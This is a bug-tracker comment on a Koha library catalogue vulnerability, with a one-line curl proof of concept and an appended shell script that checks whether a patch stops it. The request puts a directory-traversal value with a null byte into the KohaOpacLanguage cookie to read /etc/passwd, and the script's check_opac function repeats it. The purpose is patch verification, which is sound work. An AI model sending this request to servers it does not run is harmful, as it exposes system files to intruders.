http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=6629
--- Comment #10 from Frère Sébastien Marie <[email protected]> 2011-11-25 07:36:52 UTC ---
In order to check the patch against the vulnerability, here is a little PoC using curl (a shell tool):

    curl -v -b 'KohaOpacLanguage=../../../../../../../../etc/passwd%00' \
        'http://myopac.example.com/cgi-bin/koha/opac-main.pl'

A vulnerable result shows the /etc/passwd file.
A non-vulnerable result shows 'opac-main' in the default language (en).

The test supposes a Linux/BSD server.
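Added example (not part of the original comment and not Koha code): the check described above as a shell script that classifies the response body, so the patch can be re-tested without reading the output by eye. The passwd-line pattern, the use of the string 'opac-main' as the marker of a normal page, the OPAC_URL variable and the sample bodies are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not Koha code: regression check for the KohaOpacLanguage
# cookie test, to be run against an OPAC you administer.

# Assumption: a passwd entry is a line of seven colon-separated fields
# whose third and fourth fields (uid, gid) are numeric.
PASSWD_RE='^[A-Za-z_][A-Za-z0-9_.-]*:[^:]*:[0-9]+:[0-9]+:[^:]*:[^:]*:[^:]*$'

# classify_body: read a response body on stdin and print one verdict.
classify_body() {
    body=$(cat)
    if printf '%s\n' "$body" | grep -Eq "$PASSWD_RE"; then
        echo vulnerable        # file content leaked into the response
    elif printf '%s\n' "$body" | grep -q 'opac-main'; then
        echo not-vulnerable    # normal page served (assumed marker string)
    else
        echo inconclusive      # error page, non-Unix server, wrong URL...
    fi
}

# check_opac URL: send the request from the comment and classify the reply.
check_opac() {
    curl -s -b 'KohaOpacLanguage=../../../../../../../../etc/passwd%00' "$1" |
        classify_body
}

# Constructed sample bodies, so the classifier can be tried offline.
SAMPLE_LEAK='root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin'
SAMPLE_OK='<html lang="en"><body id="opac-main"><h1>Welcome</h1></body></html>'
SAMPLE_ERR='<html><body><h1>500 Internal Server Error</h1></body></html>'

# Only contact a server when OPAC_URL (hypothetical variable) is set.
if [ -n "${OPAC_URL:-}" ]; then
    check_opac "$OPAC_URL"
fi
```

An "inconclusive" verdict means the response matched neither outcome from the comment (for example an error page or a server that is not Linux/BSD), so it should not be read as proof that the patch works.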
